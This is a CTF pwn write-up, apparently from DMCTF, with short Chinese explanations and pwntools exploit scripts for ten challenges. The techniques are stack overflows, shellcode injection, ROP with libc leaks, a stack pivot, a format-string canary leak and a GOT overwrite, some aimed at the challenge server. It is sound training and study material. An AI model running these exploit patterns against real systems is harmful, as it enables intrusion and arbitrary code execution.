以下题均请注意glibc版本问题
intoverflow 整数溢出绕过,跳转到后门函数
exp:
# intoverflow: overwrite the saved return address with a fixed backdoor address.
# Python 2 script (str payloads concatenated with p32() output); the line
# breaks below restore the layout lost when the listing was collapsed.
from pwn import *

p = process('./intoverflow')
# Fixed (non-PIE) address the page calls the backdoor / system function.
system_addr = 0x8048645
p.recvuntil("Now,we need a password")
# 0x15 bytes of buffer + 4 bytes of saved register, then the return address.
payload = 'a' * 0x15 + 'b' * 4 + p32(system_addr)
# Pad to exactly 261 bytes; the write-up above attributes the length-check
# bypass to an integer overflow in the program's size handling (not visible here).
payload += 'a' * (261 - len(payload))
p.send(payload)
p.interactive()
# Defender note: the payload only works because the return address sits at a
# fixed offset and the target address is static; a stack canary or PIE would
# invalidate this fixed-layout overwrite.
stackoverflow 栈溢出跳转至后门函数
exp:
# stackoverflow: 64-bit variant of the same fixed-offset return-address overwrite.
# Python 2 script (str concatenated with p64() output).
from pwn import *

# Fixed (non-PIE) backdoor address named in the write-up.
system_addr = 0x4006ba
p = process('./stackoverflow')
p.recvuntil('Welcome to DMCTF,please input your name!')
# 0x10 bytes of buffer + 8 bytes of saved rbp, then the return address.
payload = 'a' * 0x10 + 'b' * 8 + p64(system_addr)
p.sendline(payload)
p.interactive()
# Defender note: -fstack-protector would place a canary between the buffer and
# the saved rbp/return address and abort on this overwrite.
shellcode 程序泄露buf地址,发送shellcode,跳转到shellcode执行
exp:
# shellcode: the program prints the buffer address; the script places shellcode
# in the buffer and returns into it.
# Python 2 script (bare `print` statement).
from pwn import *

p = process('./shellcode')
context.log_level = 'DEBUG'
context.arch = 'amd64'
# First 14 characters of the first line are parsed as a hex address ("0x" + 12 digits).
ret_addr = int(p.recvline()[0:14], 16)
shellcode = asm(shellcraft.amd64.sh())
print hex(ret_addr)
# Shellcode first, then padding up to 0x90 + 8 bytes (buffer + saved rbp),
# then the return address pointing back at the buffer.
payload = shellcode
payload += 'a' * (0x90 + 8 - len(shellcode))
payload += p64(ret_addr)
p.sendline(payload)
p.interactive()
# Defender note: this only works when the stack is executable (no NX) and the
# buffer address is leaked; NX alone would stop the return-into-buffer step.
Admin Panel 利用整数溢出突破输入长度限制进行栈溢出。
exp:
# Admin Panel: a stack overflow on the password field, reachable because (per
# the write-up) an integer overflow defeats the input length limit.
# Python 2 script (str payloads).
from pwn import *

# Thin send/receive helpers; every sent value is coerced with str().
s = lambda data: p.send(str(data))
sa = lambda delim, data: p.sendafter(delim, str(data))
sl = lambda data: p.sendline(str(data))
sla = lambda delim, data: p.sendlineafter(delim, str(data))
r = lambda num=4096: p.recv(num)
ru = lambda delims, drop=True: p.recvuntil(delims, drop)
# Unpack a <8-byte little-endian fragment as a u64 (NUL-padded on the right).
uu64 = lambda data: u64(data.ljust(8, '\0'))
leak = lambda name, addr: log.success('{} = {:#x}'.format(name, addr))

binary = './admin_panel'
context.binary = binary
elf = ELF(binary, checksec=False)
p = process(binary)

sla('Username: ', 'merc')
# 0x19 bytes of buffer + 4 bytes of saved register, then a fixed 32-bit return
# target; the whole thing is padded to 260 bytes with ljust.
payload = flat('a' * (0x19 + 4), 0x804864b).ljust(260, 'a')
sla('Password: ', payload)
p.interactive()
shutup 利用栈溢出调用 read 读取 shellcode 到 bss 段,最后跳转到 bss 段执行 shellcode。
exp:
# shutup: ROP into read() to stage shellcode in .bss, then return into .bss.
# Python 2 script (str payloads).
from pwn import *

# Thin send/receive helpers; every sent value is coerced with str().
s = lambda data: p.send(str(data))
sa = lambda delim, data: p.sendafter(delim, str(data))
sl = lambda data: p.sendline(str(data))
sla = lambda delim, data: p.sendlineafter(delim, str(data))
r = lambda num=4096: p.recv(num)
ru = lambda delims, drop=True: p.recvuntil(delims, drop)
# Unpack a <8-byte little-endian fragment as a u64 (NUL-padded on the right).
uu64 = lambda data: u64(data.ljust(8, '\0'))
leak = lambda name, addr: log.success('{} = {:#x}'.format(name, addr))

context.log_level = 'DEBUG'
binary = './shutup'
context.binary = binary
elf = ELF(binary, checksec=False)
p = process(binary)

# Gadget that pops three values (cleans the 3 read() arguments off the stack).
pop3 = 0x8048539
# Frame: padding (0x18 + 4) | read@plt | pop3 (read's return) | fd=0 | buf=bss |
# n=0x100 | bss (where execution goes after pop3 returns).
s(flat('a' * (0x18 + 4), elf.plt['read'], pop3, 0, elf.bss(), 0x100, elf.bss()))
# Second send is what read() consumes: the shellcode itself.
s(asm(shellcraft.sh()))
p.interactive()
# Defender note: the final jump into .bss requires .bss to be executable; NX
# (non-executable data segments) breaks the last step of this chain.
babystack 简单的rop链构造
exp:
# babystack: two-stage ROP — leak __libc_start_main via write(), resolve libc
# with LibcSearcher, then return to system("/bin/sh").
# Python 2 script (bare `print` statement); LibcSearcher is a third-party module.
from pwn import *
from LibcSearcher import *

context.log_level = 'debug'
# pwntools `args` reads KEY=VALUE command-line arguments.
if args['REMOTE']:
    p = remote('dmctf.vaala.cloud', 28182)
else:
    p = process("./babystack")


def main():
    """Run both ROP stages against the connection `p` opened at module level."""
    elf = ELF('./babystack')
    pop_rbp_ret = 0x0000000000400520  # unused in this script
    pop_rdi_ret = 0x0000000000400663
    write_plt = elf.plt['write']
    libc_start_main_got = elf.got['__libc_start_main']
    p.recvuntil("PWNME,PWNME,PWMME!!!\n")
    # NOTE: this local shadows the function name `main` inside the function body.
    main = 0x00000000004005B6
    rsi_r15_ret = 0x0000000000400661
    # Stage 1: write(1, &__libc_start_main@got, <rdx as left by the program>),
    # then return to main so the program can be overflowed a second time.
    payload1 = 'a' * 0x18 + p64(pop_rdi_ret) + p64(1) + p64(rsi_r15_ret) + p64(libc_start_main_got) + p64(0) + p64(write_plt) + p64(main)
    p.sendline(payload1)
    # Only 6 bytes of the leaked pointer are read; pad to 8 before unpacking.
    libc_start_main_add = u64(p.recv(6).ljust(8, "\x00"))
    print "libc_start_main_add=" + hex(libc_start_main_add)
    libc = LibcSearcher('__libc_start_main', libc_start_main_add)
    libc_base = libc_start_main_add - libc.dump('__libc_start_main')
    system_addr = libc_base + libc.dump('system')
    bin_addr = libc_base + libc.dump('str_bin_sh')
    print("system_addr = " + hex(system_addr))
    print("bin_addr = " + hex(bin_addr))
    p.recv()
    # Stage 2: same 0x18-byte padding, then system("/bin/sh").
    payload2 = 'a' * 0x10 + 'a' * 8 + p64(pop_rdi_ret) + p64(bin_addr) + p64(system_addr)
    p.sendline(payload2)
    p.interactive()


if __name__ == '__main__':
    main()
easyStack 简单的栈迁移(libc为2.27)
exp:
# easyStack: stack pivot via leave;ret into two fake frames in .bss, leak puts
# to locate libc (2.27 per the write-up), then return into a one_gadget.
# Python 2 script (str concatenated with p64() output).
from pwn import *

context.terminal = ['tmux', 'splitw', '-h']
context(arch='amd64', os='linux', log_level='debug')
p = remote("dmctf.vaala.cloud", 28382)
elf = ELF('./pwn')
pwn_addr = 0x4006AE  # unused in this script
pop_rdi = 0x0000000000400803
pop_rsi_ret = 0x0000000000400801
leave_ret = 0x000000000040071f
# Two writable .bss addresses used as fake stack frames.
one = 0x601160
two = 0x601060

if __name__ == "__main__":
    # Frame written at the "name?" prompt: puts(puts@got), then pivot to `two`.
    payload = p64(two) + p64(pop_rdi) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(leave_ret)
    p.sendafter('name?', payload)
    # Frame written at the "something?" prompt: read(0, one + 8, <rdx>), then
    # pivot to `one` so the freshly read data is executed as the next frame.
    payload = p64(one) + p64(pop_rdi) + p64(0) + p64(pop_rsi_ret) + p64(one + 8) + p64(0) + p64(elf.plt['read']) + p64(leave_ret)
    p.sendafter('something?', payload)
    # Overflow at "Bye?": new saved rbp = `one`, and a single-byte partial
    # overwrite of the return address (low byte 0x1f -> the leave;ret gadget).
    payload = 'a' * 0x10 + p64(one) + '\x1f'
    p.sendafter('Bye?', payload)
    # Take the last 6 bytes up to and including the 0x7f high byte of the pointer.
    leak = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
    # 0x80aa0 is the hard-coded offset of puts in the target libc.
    libc_base = leak - 0x80aa0
    success('PUTS: ' + str(hex(leak)))
    success('LIBC: ' + str(hex(libc_base)))
    # Candidate one_gadget offsets for the target libc; the third is used.
    og = [0x4f3d5, 0x4f432, 0x10a41c]
    payload = p64(og[2] + libc_base)
    p.send(payload)
    p.interactive()
flag_shop 配合 work 和 buy 功能将钱数降至 0,这样就能构造出包含 $0; 的字符串,然后用寄存器传参把 $0 给 system 调用即可。
exp:
# flag_shop: drive the balance to 0 so the shop's message buffer contains "$0;",
# then overflow the stack and call system() on that string.
# Python 2 script: `money / 2` must be integer division for range() to accept it.
from pwn import *

# Thin send/receive helpers; every sent value is coerced with str().
s = lambda data: p.send(str(data))
sa = lambda delim, data: p.sendafter(delim, str(data))
sl = lambda data: p.sendline(str(data))
sla = lambda delim, data: p.sendlineafter(delim, str(data))
r = lambda num=4096: p.recv(num)
ru = lambda delims, drop=True: p.recvuntil(delims, drop)
# Unpack a <8-byte little-endian fragment as a u64 (NUL-padded on the right).
uu64 = lambda data: u64(data.ljust(8, '\0'))
leak = lambda name, addr: log.success('{} = {:#x}'.format(name, addr))

binary = './flag_shop'
context.binary = binary
elf = ELF(binary, checksec=False)
p = process(binary)

sla('Exit\n', '5')
ru('have $')
# Reads exactly one character after "have $"; assumes the balance is a single digit.
money = int(r(1))
sla('[yes/no]', 'yes')
money += 1
times = money / 2
# Loop body inferred from the collapsed listing: repeat menu option 1 until
# the balance reaches 0 (see the write-up's description).
for i in range(times):
    sla('Exit\n', '1')
    sla('[yes/no]', 'yes')
# Address of the message buffer; msg + 15 is where the "$0;" text begins.
msg = 0x602080
pop_rdi = 0x400e03
sla('Exit\n', '1')
# 0x50 bytes of buffer + 8 bytes of saved rbp, then system(msg + 15).
payload = flat('a' * (0x50 + 8), pop_rdi, msg + 15, elf.plt['system'])
sla('[yes/no]', payload)
sl('6')
p.interactive()
马大师的绝招 格式化字符串漏洞和栈溢出。
格式化字符串漏洞可以泄露canary和libc地址,栈溢出劫持执行流。
exp:
# 马大师的绝招 (pwn-end): a format-string read leaks a libc pointer and the stack
# canary; a later stack overflow reuses the canary and returns into system().
# Python 2 script (`.next()` on a generator; print(...) with two arguments
# therefore prints a tuple).
from pwn import *

context.log_level = "debug"
local = 0
if local:
    p = process("pwn-end")
    libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
else:
    # Remote host/port are left blank in the listing (placeholders).
    p = remote("", 0)
    libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")


def get_int(content):
    """Parse `content` as a hex string, echo it, and return the integer."""
    content = int(content, 16)
    out = hex(content)
    print("content to int end is : ", out)
    return content


def get_formate_result(spli="0x", length=12):
    """Return up to `length` characters received before the next "0x".

    `spli` is unused; the delimiter is hard-coded. `drop="true"` is a non-empty
    string, which pwntools treats as truthy, so the "0x" itself is dropped.
    """
    info = p.recvuntil("0x", drop="true")
    info = info[0:length]
    print("leak info (may set a and b to get real info) : ", info)
    return info


p.recvuntil("!!!!!!!\n")
# Two positional %p reads: stack slot 21 (libc pointer) and slot 15 (canary).
p.send("%21$p%15$p")
# First call consumes whatever precedes the first "0x"; the second returns the
# 12 hex digits of the first %p (the text before the second "0x").
info = get_formate_result()
info = get_formate_result()
# 0x20840 is the hard-coded offset of the leaked pointer inside the target libc.
libc.address = get_int(info) - 0x20840
# The canary's 16 hex digits follow immediately.
info = p.recv(16)
canary = get_int(info)
p.recvuntil("flag!!!\n")
# 0x38 bytes of buffer, the canary in its slot, a second copy standing in for
# the saved rbp, then a pop rdi;ret gadget and system("/bin/sh").
payload = "a" * 0x38 + p64(canary) + p64(canary) + p64(0x00000000004008f3) + p64(libc.search("/bin/sh").next()) + p64(libc.symbols["system"])
p.sendline(payload)
p.interactive()
# Defender note: the canary is defeated only because the format-string bug
# discloses it first; fixing the format-string call (constant format, %s for
# user data) removes both leaks and leaves the overflow blocked by the canary.
接化发 利用任意地址写泄露 libc 并进行 GOT 劫持。
exp:
# 接化发: an arbitrary-address read/write primitive driven through a menu;
# used to leak _IO_2_1_stdin_ (libc base) and overwrite printf@got with system.
# Python 2 script: indexing the p64() result yields 1-char strings, and
# `addr += r(1)` accumulates str; under Python 3 these would be ints/bytes.
from pwn import *

# Thin send/receive helpers; every sent value is coerced with str().
s = lambda data: p.send(str(data))
sa = lambda delim, data: p.sendafter(delim, str(data))
sl = lambda data: p.sendline(str(data))
sla = lambda delim, data: p.sendlineafter(delim, str(data))
r = lambda num=4096: p.recv(num)
ru = lambda delims, drop=True: p.recvuntil(delims, drop)
# Unpack a <8-byte little-endian fragment as a u64 (NUL-padded on the right).
uu64 = lambda data: u64(data.ljust(8, '\0'))
leak = lambda name, addr: log.success('{} = {:#x}'.format(name, addr))

binary = './pwn'
context.binary = binary
elf = ELF(binary, checksec=False)
libc = ELF('./libc-2.23.so', checksec=False)
# The offsets below are tied to libc-2.23, hence the LD_PRELOAD (see the page's
# note about glibc versions).
p = process(binary, env={'LD_PRELOAD': './libc-2.23.so'})

# The string later passed to the hijacked printf -> system call.
sla(':', '/bin/sh;')
# Menu options as used below (inferred from the sequence of sends): '2' moves
# the cursor down one byte, '5' reads the byte at the cursor, '6' writes a byte,
# '1' moves up one byte, '7' exits.
attack = 0x602120
stdin = 0x6020b0
printf = elf.got['printf']
# Walk the cursor from `attack` down to the stdin pointer.
for i in range(attack - stdin):
    ru('>\n')
    sl('2')
# Loop body inferred from the collapsed listing: read 6 bytes of the pointer,
# one per iteration, stepping the cursor back with '1' after each read.
addr = ''
for i in range(6):
    ru('>\n')
    sl('5')
    addr += r(1)
    ru('>\n')
    sl('1')
addr = uu64(addr)
leak('stdin', addr)
base = addr - libc.sym['_IO_2_1_stdin_']
leak('base', base)
system = p64(base + libc.sym['system'])
# Move the cursor on to printf@got (the +6 compensates for the 6 '1' steps above).
for i in range(stdin - printf + 6):
    ru('>\n')
    sl('2')
# Write the first 5 bytes of the system address, then the 6th outside the loop
# before exiting with '7' (loop extent inferred from the collapsed listing).
for i in range(5):
    ru('>\n')
    sl('6')
    s(system[i])
    ru('>\n')
    sl('1')
ru('>\n')
sl('6')
s(system[5])
sl('7')
p.interactive()
# Defender note: full RELRO makes the GOT read-only after loading, which would
# turn the printf@got overwrite into a crash instead of a hijack.